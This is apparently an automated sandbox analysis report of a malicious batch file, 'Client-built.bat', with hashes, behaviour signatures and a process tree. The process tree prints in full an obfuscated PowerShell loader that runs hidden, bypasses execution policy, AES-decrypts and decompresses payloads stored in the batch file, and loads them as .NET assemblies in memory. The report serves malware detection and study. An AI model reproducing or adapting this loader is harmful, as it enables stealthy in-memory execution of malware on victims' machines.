Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 05:16
Static task
static1
Behavioral task
behavioral1
Sample
Client-built.bat
Resource
win7-20241023-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Client-built.bat
-
Size
1.6MB
-
MD5
a7aa482ba1ee0ea8d147d628d5a65f05
-
SHA1
91e3a640c294a36697d9759a29072fdb4ab62346
-
SHA256
79173bee83878cae44d9fc21fa85590711a92edc2d43caafb1350eb2800e72d7
-
SHA512
a27dae71d85910609682cc324d4c4cf5c2e772f0a57209d2fbdc3e345538487d1262148b01b16df8cfb52c3c2a72ae04eb381f7dcf33d77c01d532d421e93a32
-
SSDEEP
24576:tkjkTu1rkvOjvCsDjTprQ50JDzRj2umzby88rBFjB9a/In5PJBmpR4JRej08SG84:t859kWf+gEJe8yBBl+pIVX4
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3048 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3048 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2100 wrote to memory of 3048 2100 cmd.exe 29 PID 2100 wrote to memory of 3048 2100 cmd.exe 29 PID 2100 wrote to memory of 3048 2100 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6NsuP0HTePf1oSATs8T+qB1p4ZrLbvAIaEmbH1pdsE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kxx6XOKog+oT5+kzMuvMwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HWbzm=New-Object System.IO.MemoryStream(,$param_var); $PCqqJ=New-Object System.IO.MemoryStream; $ePDKE=New-Object System.IO.Compression.GZipStream($HWbzm, [IO.Compression.CompressionMode]::Decompress); $ePDKE.CopyTo($PCqqJ); $ePDKE.Dispose(); $HWbzm.Dispose(); $PCqqJ.Dispose(); $PCqqJ.ToArray();}function execute_function($param_var,$param2_var){ $GchUI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZfPjM=$GchUI.EntryPoint; $ZfPjM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$QJrfq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($aydBO in $QJrfq) { if ($aydBO.StartsWith(':: ')) { $CdaqF=$aydBO.Substring(3); break; }}$payloads_var=[string[]]$CdaqF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-